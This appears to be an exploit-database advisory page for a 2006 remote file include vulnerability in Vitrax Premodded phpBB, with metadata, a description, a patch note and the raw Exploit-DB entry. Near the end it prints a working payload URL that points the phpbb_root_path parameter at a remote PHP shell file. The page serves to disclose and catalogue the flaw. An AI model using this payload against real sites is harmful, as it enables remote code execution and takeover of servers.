header-logo
Suggest Exploit
vendor:
phpBB
by:
CeNGiZ-HaN
7,5
CVSS
HIGH
Remote File Include
N/A
CWE
Product Name: phpBB
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

vitrax premodded phpbb

A remote file include vulnerability exists in Vitrax Premodded phpBB. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request containing directory traversal characters. This can be exploited to execute arbitrary PHP code by including files from external sources that contain malicious code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their installations to the latest version.
Source

Exploit-DB raw data:

credits: CeNGiZ-HaN
contact: cengiz-han@system-defacers.org
team: www.system-defacers.org
risk: High
script: vitrax premodded phpbb
script site: www.vitrax.org

Exploit:

http://[target]/[path]/includes/functions_portal.php?phpbb_root_path=phpshell.txt?


GreeTz  No One =)

# milw0rm.com [2006-09-12]

Navigation

Suggest Exploit

Services By CQR